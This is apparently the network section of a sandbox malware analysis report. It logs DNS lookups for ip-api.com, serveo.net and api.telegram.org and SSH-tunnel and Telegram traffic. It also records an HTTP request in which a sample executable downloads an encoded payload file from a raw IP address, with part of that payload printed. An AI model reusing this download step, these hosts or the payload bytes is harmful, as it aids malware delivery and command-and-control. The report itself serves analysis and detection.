                                                                                                    Feb 10, 2024 16:17:20.497072935 CET49744443192.168.2.4149.154.167.220
                                                                                                    Feb 10, 2024 16:17:20.501995087 CET49744443192.168.2.4149.154.167.220
                                                                                                    Feb 10, 2024 16:17:20.502017975 CET44349744149.154.167.220192.168.2.4
                                                                                                    Feb 10, 2024 16:17:20.543448925 CET2249742138.68.79.95192.168.2.4
                                                                                                    Feb 10, 2024 16:17:20.543584108 CET4974222192.168.2.4138.68.79.95
                                                                                                    Feb 10, 2024 16:17:20.545486927 CET497418080192.168.2.4185.119.118.59
                                                                                                    Feb 10, 2024 16:17:20.611521006 CET8049739208.95.112.1192.168.2.4
                                                                                                    Feb 10, 2024 16:17:20.611609936 CET4973980192.168.2.4208.95.112.1
                                                                                                    Feb 10, 2024 16:17:20.663587093 CET2249740138.68.79.95192.168.2.4
                                                                                                    Feb 10, 2024 16:17:20.663784027 CET4974022192.168.2.4138.68.79.95
                                                                                                    Feb 10, 2024 16:17:20.691998005 CET44349743149.154.167.220192.168.2.4
                                                                                                    Feb 10, 2024 16:17:20.692172050 CET44349743149.154.167.220192.168.2.4
                                                                                                    Feb 10, 2024 16:17:20.692562103 CET49743443192.168.2.4149.154.167.220
                                                                                                    Feb 10, 2024 16:17:20.695668936 CET49743443192.168.2.4149.154.167.220
                                                                                                    Feb 10, 2024 16:17:20.748964071 CET2249742138.68.79.95192.168.2.4
                                                                                                    Feb 10, 2024 16:17:20.749596119 CET2249742138.68.79.95192.168.2.4
                                                                                                    Feb 10, 2024 16:17:20.749793053 CET4974222192.168.2.4138.68.79.95
                                                                                                    Feb 10, 2024 16:17:20.871381998 CET2249740138.68.79.95192.168.2.4
                                                                                                    Feb 10, 2024 16:17:20.871464014 CET2249740138.68.79.95192.168.2.4
                                                                                                    Feb 10, 2024 16:17:20.872169018 CET4974022192.168.2.4138.68.79.95
                                                                                                    Feb 10, 2024 16:17:20.920857906 CET44349744149.154.167.220192.168.2.4
                                                                                                    Feb 10, 2024 16:17:20.920958042 CET49744443192.168.2.4149.154.167.220
                                                                                                    Feb 10, 2024 16:17:20.923152924 CET49744443192.168.2.4149.154.167.220
                                                                                                    Feb 10, 2024 16:17:20.923166990 CET44349744149.154.167.220192.168.2.4
                                                                                                    Feb 10, 2024 16:17:20.923585892 CET44349744149.154.167.220192.168.2.4
                                                                                                    Feb 10, 2024 16:17:20.955322027 CET2249742138.68.79.95192.168.2.4
                                                                                                    Feb 10, 2024 16:17:20.955614090 CET4974222192.168.2.4138.68.79.95
                                                                                                    Feb 10, 2024 16:17:20.967243910 CET49744443192.168.2.4149.154.167.220
                                                                                                    Feb 10, 2024 16:17:21.007571936 CET49744443192.168.2.4149.154.167.220
                                                                                                    Feb 10, 2024 16:17:21.049902916 CET44349744149.154.167.220192.168.2.4
                                                                                                    Feb 10, 2024 16:17:21.079830885 CET2249740138.68.79.95192.168.2.4
                                                                                                    Feb 10, 2024 16:17:21.079869986 CET2249740138.68.79.95192.168.2.4
                                                                                                    Feb 10, 2024 16:17:21.079894066 CET2249740138.68.79.95192.168.2.4
                                                                                                    Feb 10, 2024 16:17:21.079915047 CET2249740138.68.79.95192.168.2.4
                                                                                                    Feb 10, 2024 16:17:21.079936981 CET2249740138.68.79.95192.168.2.4
                                                                                                    Feb 10, 2024 16:17:21.079957962 CET2249740138.68.79.95192.168.2.4
                                                                                                    Feb 10, 2024 16:17:21.080051899 CET4974022192.168.2.4138.68.79.95
                                                                                                    Feb 10, 2024 16:17:21.080053091 CET4974022192.168.2.4138.68.79.95
                                                                                                    Feb 10, 2024 16:17:21.080053091 CET4974022192.168.2.4138.68.79.95
                                                                                                    Feb 10, 2024 16:17:21.082401037 CET497388080192.168.2.4185.119.118.59
                                                                                                    Feb 10, 2024 16:17:21.084126949 CET49745443192.168.2.4149.154.167.220
                                                                                                    Feb 10, 2024 16:17:21.084172010 CET44349745149.154.167.220192.168.2.4
                                                                                                    Feb 10, 2024 16:17:21.084239960 CET49745443192.168.2.4149.154.167.220
                                                                                                    Feb 10, 2024 16:17:21.084604025 CET49745443192.168.2.4149.154.167.220
                                                                                                    Feb 10, 2024 16:17:21.084623098 CET44349745149.154.167.220192.168.2.4
                                                                                                    Feb 10, 2024 16:17:21.161072969 CET2249742138.68.79.95192.168.2.4
                                                                                                    Feb 10, 2024 16:17:21.161575079 CET4974222192.168.2.4138.68.79.95
                                                                                                    Feb 10, 2024 16:17:21.297418118 CET808049738185.119.118.59192.168.2.4
                                                                                                    Feb 10, 2024 16:17:21.297563076 CET497388080192.168.2.4185.119.118.59
                                                                                                    Feb 10, 2024 16:17:21.403270960 CET2249742138.68.79.95192.168.2.4
                                                                                                    Feb 10, 2024 16:17:21.403456926 CET4974222192.168.2.4138.68.79.95
                                                                                                    Feb 10, 2024 16:17:21.473133087 CET44349744149.154.167.220192.168.2.4
                                                                                                    Feb 10, 2024 16:17:21.473311901 CET44349744149.154.167.220192.168.2.4
                                                                                                    Feb 10, 2024 16:17:21.473371983 CET49744443192.168.2.4149.154.167.220
                                                                                                    Feb 10, 2024 16:17:21.473900080 CET49744443192.168.2.4149.154.167.220
                                                                                                    Feb 10, 2024 16:17:21.509809017 CET44349745149.154.167.220192.168.2.4
                                                                                                    Feb 10, 2024 16:17:21.511885881 CET49745443192.168.2.4149.154.167.220
                                                                                                    Feb 10, 2024 16:17:21.511945963 CET44349745149.154.167.220192.168.2.4
                                                                                                    Feb 10, 2024 16:17:21.608808041 CET2249742138.68.79.95192.168.2.4
                                                                                                    Feb 10, 2024 16:17:21.608882904 CET2249742138.68.79.95192.168.2.4
                                                                                                    Feb 10, 2024 16:17:21.612914085 CET4974222192.168.2.4138.68.79.95
                                                                                                    Feb 10, 2024 16:17:21.818342924 CET2249742138.68.79.95192.168.2.4
                                                                                                    Feb 10, 2024 16:17:21.818381071 CET2249742138.68.79.95192.168.2.4
                                                                                                    Feb 10, 2024 16:17:21.818403006 CET2249742138.68.79.95192.168.2.4
                                                                                                    Feb 10, 2024 16:17:21.818423033 CET2249742138.68.79.95192.168.2.4
                                                                                                    Feb 10, 2024 16:17:21.818444967 CET2249742138.68.79.95192.168.2.4
                                                                                                    Feb 10, 2024 16:17:21.818480968 CET2249742138.68.79.95192.168.2.4
                                                                                                    Feb 10, 2024 16:17:21.818475962 CET4974222192.168.2.4138.68.79.95
                                                                                                    Feb 10, 2024 16:17:21.818476915 CET4974222192.168.2.4138.68.79.95
                                                                                                    Feb 10, 2024 16:17:21.818572044 CET4974222192.168.2.4138.68.79.95
                                                                                                    Feb 10, 2024 16:17:21.821186066 CET497418080192.168.2.4185.119.118.59
                                                                                                    Feb 10, 2024 16:17:21.822941065 CET49746443192.168.2.4149.154.167.220
                                                                                                    Feb 10, 2024 16:17:21.823020935 CET44349746149.154.167.220192.168.2.4
                                                                                                    Feb 10, 2024 16:17:21.823122978 CET49746443192.168.2.4149.154.167.220
                                                                                                    Feb 10, 2024 16:17:21.823493958 CET49746443192.168.2.4149.154.167.220
                                                                                                    Feb 10, 2024 16:17:21.823530912 CET44349746149.154.167.220192.168.2.4
                                                                                                    Feb 10, 2024 16:17:22.036088943 CET808049741185.119.118.59192.168.2.4
                                                                                                    Feb 10, 2024 16:17:22.036168098 CET497418080192.168.2.4185.119.118.59
                                                                                                    Feb 10, 2024 16:17:22.070139885 CET44349745149.154.167.220192.168.2.4
                                                                                                    Feb 10, 2024 16:17:22.070200920 CET44349745149.154.167.220192.168.2.4
                                                                                                    Feb 10, 2024 16:17:22.071192980 CET49745443192.168.2.4149.154.167.220
                                                                                                    Feb 10, 2024 16:17:22.075911045 CET49745443192.168.2.4149.154.167.220
                                                                                                    Feb 10, 2024 16:17:22.178201914 CET2249740138.68.79.95192.168.2.4
                                                                                                    Feb 10, 2024 16:17:22.178241968 CET2249740138.68.79.95192.168.2.4
                                                                                                    Feb 10, 2024 16:17:22.178462982 CET4974022192.168.2.4138.68.79.95
                                                                                                    Feb 10, 2024 16:17:22.179250956 CET4974022192.168.2.4138.68.79.95
                                                                                                    Feb 10, 2024 16:17:22.250319004 CET44349746149.154.167.220192.168.2.4
                                                                                                    Feb 10, 2024 16:17:22.251621962 CET49746443192.168.2.4149.154.167.220
                                                                                                    Feb 10, 2024 16:17:22.251682043 CET44349746149.154.167.220192.168.2.4
                                                                                                    Feb 10, 2024 16:17:22.387151003 CET2249740138.68.79.95192.168.2.4
                                                                                                    Feb 10, 2024 16:17:22.397252083 CET4974022192.168.2.4138.68.79.95
                                                                                                    Feb 10, 2024 16:17:22.605124950 CET2249740138.68.79.95192.168.2.4
                                                                                                    Feb 10, 2024 16:17:22.654850006 CET4974022192.168.2.4138.68.79.95
                                                                                                    Feb 10, 2024 16:17:22.807017088 CET44349746149.154.167.220192.168.2.4
                                                                                                    Feb 10, 2024 16:17:22.807200909 CET44349746149.154.167.220192.168.2.4
                                                                                                    Feb 10, 2024 16:17:22.807471991 CET49746443192.168.2.4149.154.167.220
                                                                                                    Feb 10, 2024 16:17:22.807703018 CET49746443192.168.2.4149.154.167.220
                                                                                                    Feb 10, 2024 16:17:23.028242111 CET2249742138.68.79.95192.168.2.4
                                                                                                    Feb 10, 2024 16:17:23.028361082 CET2249742138.68.79.95192.168.2.4
                                                                                                    Feb 10, 2024 16:17:23.029496908 CET4974222192.168.2.4138.68.79.95
                                                                                                    Feb 10, 2024 16:17:23.030333042 CET4974222192.168.2.4138.68.79.95
                                                                                                    Feb 10, 2024 16:17:23.235929012 CET2249742138.68.79.95192.168.2.4
                                                                                                    Feb 10, 2024 16:17:23.261353970 CET4974222192.168.2.4138.68.79.95
                                                                                                    Feb 10, 2024 16:17:23.466623068 CET2249742138.68.79.95192.168.2.4
                                                                                                    Feb 10, 2024 16:17:23.514146090 CET4974222192.168.2.4138.68.79.95
                                                                                                    Feb 10, 2024 16:17:37.867306948 CET2249740138.68.79.95192.168.2.4
                                                                                                    Feb 10, 2024 16:17:37.867394924 CET4974022192.168.2.4138.68.79.95
                                                                                                    Feb 10, 2024 16:17:38.723332882 CET2249742138.68.79.95192.168.2.4
                                                                                                    Feb 10, 2024 16:17:38.724828959 CET4974222192.168.2.4138.68.79.95
                                                                                                    Feb 10, 2024 16:17:53.071433067 CET2249740138.68.79.95192.168.2.4
                                                                                                    Feb 10, 2024 16:17:53.075329065 CET4974022192.168.2.4138.68.79.95
                                                                                                    Feb 10, 2024 16:17:53.927589893 CET2249742138.68.79.95192.168.2.4
                                                                                                    Feb 10, 2024 16:17:53.928122044 CET4974222192.168.2.4138.68.79.95
                                                                                                    Feb 10, 2024 16:18:08.279517889 CET2249740138.68.79.95192.168.2.4
                                                                                                    Feb 10, 2024 16:18:08.279607058 CET4974022192.168.2.4138.68.79.95
                                                                                                    Feb 10, 2024 16:18:09.132179022 CET2249742138.68.79.95192.168.2.4
                                                                                                    Feb 10, 2024 16:18:09.132299900 CET4974222192.168.2.4138.68.79.95
                                                                                                    Feb 10, 2024 16:18:23.483294010 CET2249740138.68.79.95192.168.2.4
                                                                                                    Feb 10, 2024 16:18:23.483530998 CET4974022192.168.2.4138.68.79.95
                                                                                                    Feb 10, 2024 16:18:24.335359097 CET2249742138.68.79.95192.168.2.4
                                                                                                    Feb 10, 2024 16:18:24.335434914 CET4974222192.168.2.4138.68.79.95
                                                                                                    Feb 10, 2024 16:18:38.691306114 CET2249740138.68.79.95192.168.2.4
                                                                                                    Feb 10, 2024 16:18:38.691412926 CET4974022192.168.2.4138.68.79.95
                                                                                                    Feb 10, 2024 16:18:39.539433956 CET2249742138.68.79.95192.168.2.4
                                                                                                    Feb 10, 2024 16:18:39.539526939 CET4974222192.168.2.4138.68.79.95
                                                                                                    Feb 10, 2024 16:18:53.899416924 CET2249740138.68.79.95192.168.2.4
                                                                                                    Feb 10, 2024 16:18:53.899602890 CET4974022192.168.2.4138.68.79.95
                                                                                                    Feb 10, 2024 16:18:54.743271112 CET2249742138.68.79.95192.168.2.4
                                                                                                    Feb 10, 2024 16:18:54.743417025 CET4974222192.168.2.4138.68.79.95
                                                                                                    Feb 10, 2024 16:19:09.107270002 CET2249740138.68.79.95192.168.2.4
                                                                                                    Feb 10, 2024 16:19:09.107474089 CET4974022192.168.2.4138.68.79.95
                                                                                                    Feb 10, 2024 16:19:09.947406054 CET2249742138.68.79.95192.168.2.4
                                                                                                    Feb 10, 2024 16:19:09.947509050 CET4974222192.168.2.4138.68.79.95
                                                                                                    Feb 10, 2024 16:19:24.315329075 CET2249740138.68.79.95192.168.2.4
                                                                                                    Feb 10, 2024 16:19:24.315613031 CET4974022192.168.2.4138.68.79.95
                                                                                                    Feb 10, 2024 16:19:25.151099920 CET2249742138.68.79.95192.168.2.4
                                                                                                    Feb 10, 2024 16:19:25.151165962 CET4974222192.168.2.4138.68.79.95
                                                                                                    Feb 10, 2024 16:19:28.361043930 CET4974022192.168.2.4138.68.79.95
                                                                                                    Feb 10, 2024 16:19:28.372390985 CET4974222192.168.2.4138.68.79.95
                                                                                                    Feb 10, 2024 16:19:28.568891048 CET2249740138.68.79.95192.168.2.4
                                                                                                    Feb 10, 2024 16:19:28.578094959 CET2249742138.68.79.95192.168.2.4
                                                                                                    Feb 10, 2024 16:19:28.585113049 CET4974022192.168.2.4138.68.79.95
                                                                                                    Feb 10, 2024 16:19:28.685769081 CET4974222192.168.2.4138.68.79.95
                                                                                                    Feb 10, 2024 16:19:28.708792925 CET4974222192.168.2.4138.68.79.95
                                                                                                    Feb 10, 2024 16:19:28.831078053 CET2249740138.68.79.95192.168.2.4
                                                                                                    Feb 10, 2024 16:19:28.951452971 CET2249742138.68.79.95192.168.2.4
                                                                                                    Feb 10, 2024 16:19:43.795293093 CET2249740138.68.79.95192.168.2.4
                                                                                                    Feb 10, 2024 16:19:43.795594931 CET4974022192.168.2.4138.68.79.95
                                                                                                    Feb 10, 2024 16:19:43.923296928 CET2249742138.68.79.95192.168.2.4
                                                                                                    Feb 10, 2024 16:19:43.923386097 CET4974222192.168.2.4138.68.79.95
                                                                                                    Feb 10, 2024 16:19:59.003113985 CET2249740138.68.79.95192.168.2.4
                                                                                                    Feb 10, 2024 16:19:59.003410101 CET4974022192.168.2.4138.68.79.95
                                                                                                    Feb 10, 2024 16:19:59.127135038 CET2249742138.68.79.95192.168.2.4
                                                                                                    Feb 10, 2024 16:19:59.127238035 CET4974222192.168.2.4138.68.79.95
                                                                                                    Feb 10, 2024 16:20:14.214940071 CET2249740138.68.79.95192.168.2.4
                                                                                                    Feb 10, 2024 16:20:14.215151072 CET4974022192.168.2.4138.68.79.95
                                                                                                    Feb 10, 2024 16:20:14.331005096 CET2249742138.68.79.95192.168.2.4
                                                                                                    Feb 10, 2024 16:20:14.331123114 CET4974222192.168.2.4138.68.79.95
                                                                                                    Feb 10, 2024 16:20:29.422979116 CET2249740138.68.79.95192.168.2.4
                                                                                                    Feb 10, 2024 16:20:29.423302889 CET4974022192.168.2.4138.68.79.95
                                                                                                    Feb 10, 2024 16:20:29.535002947 CET2249742138.68.79.95192.168.2.4
                                                                                                    Feb 10, 2024 16:20:29.535103083 CET4974222192.168.2.4138.68.79.95
                                                                                                    Feb 10, 2024 16:20:44.631213903 CET2249740138.68.79.95192.168.2.4
                                                                                                    Feb 10, 2024 16:20:44.631416082 CET4974022192.168.2.4138.68.79.95
                                                                                                    Feb 10, 2024 16:20:44.739269972 CET2249742138.68.79.95192.168.2.4
                                                                                                    Feb 10, 2024 16:20:44.739370108 CET4974222192.168.2.4138.68.79.95
                                                                                                    Feb 10, 2024 16:20:59.843040943 CET2249740138.68.79.95192.168.2.4
                                                                                                    Feb 10, 2024 16:20:59.843226910 CET4974022192.168.2.4138.68.79.95
                                                                                                    Feb 10, 2024 16:20:59.943020105 CET2249742138.68.79.95192.168.2.4
                                                                                                    Feb 10, 2024 16:20:59.943265915 CET4974222192.168.2.4138.68.79.95
                                                                                                    Feb 10, 2024 16:21:15.054945946 CET2249740138.68.79.95192.168.2.4
                                                                                                    Feb 10, 2024 16:21:15.055129051 CET4974022192.168.2.4138.68.79.95
                                                                                                    Feb 10, 2024 16:21:15.146835089 CET2249742138.68.79.95192.168.2.4
                                                                                                    Feb 10, 2024 16:21:15.146929979 CET4974222192.168.2.4138.68.79.95
                                                                                                    Feb 10, 2024 16:21:30.262789011 CET2249740138.68.79.95192.168.2.4
                                                                                                    Feb 10, 2024 16:21:30.262975931 CET4974022192.168.2.4138.68.79.95
                                                                                                    Feb 10, 2024 16:21:30.350822926 CET2249742138.68.79.95192.168.2.4
                                                                                                    Feb 10, 2024 16:21:30.350927114 CET4974222192.168.2.4138.68.79.95

                                                                                                    UDP Packets

                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                    Feb 10, 2024 16:17:17.405252934 CET5195453192.168.2.41.1.1.1
                                                                                                    Feb 10, 2024 16:17:17.523276091 CET53519541.1.1.1192.168.2.4
                                                                                                    Feb 10, 2024 16:17:18.442881107 CET5880053192.168.2.41.1.1.1
                                                                                                    Feb 10, 2024 16:17:18.678560972 CET53588001.1.1.1192.168.2.4
                                                                                                    Feb 10, 2024 16:17:19.532113075 CET5261653192.168.2.41.1.1.1
                                                                                                    Feb 10, 2024 16:17:19.649746895 CET53526161.1.1.1192.168.2.4

                                                                                                    DNS Queries

                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                    Feb 10, 2024 16:17:17.405252934 CET192.168.2.41.1.1.10xc02bStandard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                                                                    Feb 10, 2024 16:17:18.442881107 CET192.168.2.41.1.1.10xd06dStandard query (0)serveo.netA (IP address)IN (0x0001)false
                                                                                                    Feb 10, 2024 16:17:19.532113075 CET192.168.2.41.1.1.10xa81fStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false

                                                                                                    DNS Answers

                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                    Feb 10, 2024 16:17:17.523276091 CET1.1.1.1192.168.2.40xc02bNo error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                                                                    Feb 10, 2024 16:17:18.678560972 CET1.1.1.1192.168.2.40xd06dNo error (0)serveo.net138.68.79.95A (IP address)IN (0x0001)false
                                                                                                    Feb 10, 2024 16:17:19.649746895 CET1.1.1.1192.168.2.40xa81fNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false

                                                                                                    HTTP Request Dependency Graph

                                                                                                    • api.telegram.org
                                                                                                    • 82.147.85.194
                                                                                                    • ip-api.com

                                                                                                    HTTP Packets

                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    0192.168.2.44972982.147.85.194806780C:\Users\user\Desktop\jqOHOuPMJP.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Feb 10, 2024 16:17:08.643671036 CET87OUTGET /byte/@jokerbot880901.txt HTTP/1.1
                                                                                                    Host: 82.147.85.194
                                                                                                    Connection: Keep-Alive
                                                                                                    Feb 10, 2024 16:17:08.921837091 CET1286INHTTP/1.1 200 OK
                                                                                                    Date: Sat, 10 Feb 2024 15:17:08 GMT
                                                                                                    Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/7.3.29
                                                                                                    Last-Modified: Sat, 10 Feb 2024 11:23:12 GMT
                                                                                                    ETag: "2ad0c-6110545204780"
                                                                                                    Accept-Ranges: bytes
                                                                                                    Content-Length: 175372
                                                                                                    Keep-Alive: timeout=5, max=100
                                                                                                    Connection: Keep-Alive
                                                                                                    Content-Type: text/plain
                                                                                                    Data Raw: 4e 69 48 72 65 33 68 37 65 33 74 2f 65 33 74 37 68 49 52 37 65 38 4e 37 65 33 74 37 65 33 74 37 4f 33 74 37 65 33 74 37 65 33 74 37 65 33 74 37 65 33 74 37 65 33 74 37 65 33 74 37 65 33 74 37 65 33 74 37 65 33 74 37 65 33 74 37 65 33 74 37 2b 33 74 37 65 33 56 6b 77 58 56 37 7a 33 4b 32 57 73 4e 36 4e 37 5a 61 4c 78 4d 53 43 46 73 4c 43 52 51 63 43 52 6f 57 57 78 67 61 46 52 55 55 44 31 73 5a 48 6c 73 4a 44 68 56 62 45 68 56 62 50 7a 51 6f 57 78 59 55 48 78 35 56 64 6e 5a 78 58 33 74 37 65 33 74 37 65 33 73 72 50 6e 74 37 4e 33 70 34 65 2f 6c 36 49 4d 52 37 65 33 74 37 65 33 74 37 65 35 74 37 57 58 74 77 65 6b 74 37 65 37 56 36 65 33 74 78 65 33 74 37 65 33 74 37 35 5a 5a 36 65 33 74 62 65 33 74 37 65 33 6c 37 65 33 73 37 65 33 74 62 65 33 74 37 65 58 74 37 66 33 74 37 65 33 74 37 65 33 74 39 65 33 74 37 65 33 74 37 65 33 73 37 65 58 74 37 65 58 74 37 65 33 74 37 65 33 6c 37 47 2f 35 37 65 32 74 37 65 32 74 37 65 33 74 37 61 33 74 37 61 33 74 37 65 33 74 37 65 32 74 37 65 33 74 37 65 33 74 37 65 33 74 37 65 7a 65 57 65 6e 73 30 65 33 74 37 65 33 74 35 65 30 4e 38 65 33 74 37 65 33 74 37 65 33 74 37 65 33 75 68 65 6e 75 7a 58 48 74 37 65 31 74 35 65 33 64 37 65 33 74 37 65 33 74 37 65 33 74 37 65 33 74 37 65 33 74 37 65 33 74 37 65 33 74 37 65 33 74 37 65 33 74 37 65 33 74 37 65 33 74 37 65 33 74 37 65 33 74 37 65 33 74 37 65 33 74 37 65 33 74 37 65 33 74 37 57 33 74 37 63 33 74 37 65 33 74 37 65 33 74 37 65 33 74 37 63 31 74 37 65 7a 4e 37 65 33 74 37 65 33 74 37 65 33 74 37 65 31 55 50 48 67 4d 50 65 33 74 37 33 37 5a 36 65 33 74 62 65 33 74 37 74 58 70 37 65 33 6c 37 65 33 74 37 65 33 74 37 65 33 74 37 65 33 74 37 65 31 74 37 65 78 74 56 43 51 67 4a 47 48 74 37 65 30 4e 38 65 33 74 37 65 33 6c 37 65 33 4e 37 65 33 75 72 65 6e 74 37 65 33 74 37 65 33 74 37 65 33 74 37 65 33 73 37 65 33 73 37 56 51 6b 65 46 78 51 59 65 33 74 33 65 33 74 37 65 31 74 35 65 33 74 35 65 33 74 37 6f 33 70 37 65 33 74 37 65 33 74 37 65 33 74 37 65 33 74 37 4f 33 74 37 4f 58 74 37 65 33 74 37 65 33 74 37 65 33 74 37 65 33 74 37 65 33 76 37 6c 6e 70 37 65 33 74 37 65 7a 4e 37 65 33 74 35 65 33 35 37 6a 36 68 37 65 79 4e 69 65 6e 74 36 65 33 74 37 54 6e 74 37 66 58 74 37 65 33 74 37 65 33 74 37 65 33 74 37 65 33 74 37 65 33 74 37 65 33 74 37 65 33 74 37 65 33 74 37 65 33 74 37 65 33 74 37 65 33 74 37 65 33 74 37 65 33 74 37 65 33 74 37 65 33 74 37 65 79 73 77 65 6e 6c 73 63 47 39 37 68 49 53 45 68 49 53 45 68 49 53 45 68 49 53 45 65 33 74 37 65 32 39 37 65 33 74 75 65 33 74 37 62 58 74 37 65 32 78 37 65 33 74 69 65 33 74 37 54 6e 74 37 65 79 74 37 65 33 73 56 65 33 74 37 44 48 74 37 65 77 42 37 65 33 76 38 65 33 74 37 38 6e 74 37 65 2f 46 37 65 33 76 77 65 33 74 37 39 48 74 37 65 39 70 37 65 33 76 5a 65 33 74 37 2f 6e 70 37 65 38 42 36 65 33 76 47 65 6e 74 37 71 6e 70 37 65 34 39 36 65 33 74 35 65 58 74 37 64 6e 6c 37 65 32 6c 35 65 33 74 6b 65 58 74 37 42 33 6c 37 65 36 5a 34 65 33
                                                                                                    Data Ascii: NiHre3h7e3t/e3t7hIR7e8N7e3t7e3t7O3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7+3t7e3VkwXV7z3K2WsN6N7ZaLxMSCFsLCRQcCRoWWxgaFRUUD1sZHlsJDhVbEhVbPzQoWxYUHx5VdnZxX3t7e3t7e3srPnt7N3p4e/l6IMR7e3t7e3t7e5t7WXtwekt7e7V6e3txe3t7e3t75ZZ6e3tbe3t7e3l7e3s7e3tbe3t7eXt7f3t7e3t7e3t9e3t7e3t7e3s7eXt7eXt7e3t7e3l7G/57e2t7e2t7e3t7a3t7a3t7e3t7e2t7e3t7e3t7e3t7ezeWens0e3t7e3t5e0N8e3t7e3t7e3t7e3uhenuzXHt7e1t5e3d7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7W3t7c3t7e3t7e3t7e3t7c1t7ezN7e3t7e3t7e3t7e1UPHgMPe3t737Z6e3tbe3t7tXp7e3l7e3t7e3t7e3t7e3t7e1t7extVCQgJGHt7e0N8e3t7e3l7e3N7e3urent7e3t7e3t7e3t7e3s7e3s7VQkeFxQYe3t3e3t7e1t5e3t5e3t7o3p7e3t7e3t7e3t7e3t7O3t7OXt7e3t7e3t7e3t7e3t7e3v7lnp7e3t7ezN7e3t5e357j6h7eyNient6e3t7Tnt7fXt7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7e3t7eyswenlscG97hISEhISEhISEhISEe3t7e297e3tue3t7bXt7e2x7e3tie3t7Tnt7eyt7e3sVe3t7DHt7ewB7e3v8e3t78nt7e/F7e3vwe3t79Ht7e9p7e3vZe3t7/np7e8B6e3vGent7qnp7e496e3t5eXt7dnl7e2l5e3tkeXt7B3l7e6Z4e3
                                                                                                    Feb 10, 2024 16:17:08.921875000 CET1286INData Raw: 75 6c 65 48 74 37 6d 48 68 37 65 33 70 2f 65 33 74 35 66 33 74 37 51 33 39 37 65 7a 42 2f 65 33 76 69 66 6e 74 37 69 6e 35 37 65 38 42 39 65 33 74 76 66 48 74 37 62 6e 78 37 65 79 42 38 65 33 74 36 63 33 74 37 57 58 4e 37 65 31 68 7a 65 33 74 64
                                                                                                    Data Ascii: uleHt7mHh7e3p/e3t5f3t7Q397ezB/e3vifnt7in57e8B9e3tvfHt7bnx7eyB8e3t6c3t7WXN7e1hze3tdc3t7XHN7e793e3uRd3t7RnZ7e79oe3s9b3t72297e0Nue3uEbnt7e217e3dse3tJbHt7C2x7ewhse3saZXt762R7e+pke3uAW3t7+Vh7e2tce3uwUHt7phh7e/wSe3vyEnt78RJ7e/ASe3srMH19e3t7eysweH9ve
                                                                                                    Feb 10, 2024 16:17:08.921915054 CET1286INData Raw: 65 33 74 39 55 51 55 4a 4e 52 4a 37 43 31 4e 36 65 33 74 39 43 63 38 65 65 77 73 4a 66 78 4e 37 43 31 4e 36 65 33 74 39 55 79 31 37 65 33 31 52 4f 51 6c 2f 45 33 73 4c 55 33 70 37 65 33 33 37 37 33 74 37 66 31 46 56 43 47 35 36 65 33 33 37 32 58
                                                                                                    Data Ascii: e3t9UQUJNRJ7C1N6e3t9Cc8eewsJfxN7C1N6e3t9Uy17e31ROQl/E3sLU3p7e33773t7f1FVCG56e3372Xt7f1ElewXae3t/U3R6e33723t7f1MCentxe1EZZD32Ant7el6rvHt7f1Mse3tx+917e39R3QVOe3t/CYcPewtTent7fVP3e3tx+9B7e38JYQ57C1N6e3t9+9d7e39R3QluDHsLU3p7e3371nt7fwVPe3t/CZsMewt
                                                                                                    Feb 10, 2024 16:17:08.921937943 CET1286INData Raw: 4e 6c 68 58 39 6f 66 32 70 2f 51 62 61 45 68 49 51 46 64 33 74 37 66 33 31 38 35 58 74 39 62 43 4e 78 66 51 56 33 65 33 74 2f 39 52 4b 46 66 32 68 2b 61 6e 35 42 32 49 53 45 68 46 46 37 65 32 68 4c 65 48 74 4e 65 33 74 37 65 48 74 37 61 6e 74 35
                                                                                                    Data Ascii: NlhX9of2p/QbaEhIQFd3t7f3185Xt9bCNxfQV3e3t/9RKFf2h+an5B2ISEhFF7e2hLeHtNe3t7eHt7ant5Y2IIWHt7cXF9eG1Tf3t7fXB8eF5BfXt7e10FWnt7cQZ9e3t/fHkGf3t7f3x3Q3t7e3tzUXt7aEt/e0N7e3t/e3tqewhae3t9XnheQX17e3tdBVp7e3EGfXt7f155Bn57e39eYwZye3t/Xn8GcXt7f3F9cEN7e3t7f
                                                                                                    Feb 10, 2024 16:17:08.921962976 CET1286INData Raw: 59 58 74 37 63 58 46 39 63 32 30 55 53 6e 74 37 63 57 32 46 65 6d 68 79 61 6e 4a 43 63 33 74 37 65 33 31 7a 55 32 46 37 65 33 46 78 66 31 4e 4a 65 33 74 78 64 6e 74 79 61 48 46 74 61 48 42 44 55 6e 74 37 65 32 70 78 61 6e 44 68 61 48 64 35 65 47
                                                                                                    Data Ascii: YXt7cXF9c20USnt7cW2FemhyanJCc3t7e31zU2F7e3Fxf1NJe3txdntyaHFtaHBDUnt7e2pxanDhaHd5eGp3fWp3U0h7e3FTYXt7cQnGe3sLU3x7e31danBsI2hwanBqcfUSRLeEhIR/U097e3Fof3tqf2h2bWh1Q2Z7e3tqdmp14Wh0eXhqdH0Jxnt7C1Nxe3t9e2p1bCNodWp1anb1EkSjhISEUXtoS397XXp7e3B7e2p7eQB
                                                                                                    Feb 10, 2024 16:17:08.921992064 CET1286INData Raw: 74 37 65 32 70 71 61 6d 74 35 41 48 78 37 65 33 39 7a 5a 46 55 6a 61 6e 45 6a 61 6e 41 6a 61 6e 63 55 4f 33 74 37 63 51 5a 6e 65 33 74 2f 61 6e 42 74 68 58 6c 6f 62 6d 70 75 51 6d 4e 37 65 33 74 37 65 58 6b 41 66 48 74 37 66 33 4e 6b 56 53 4e 71
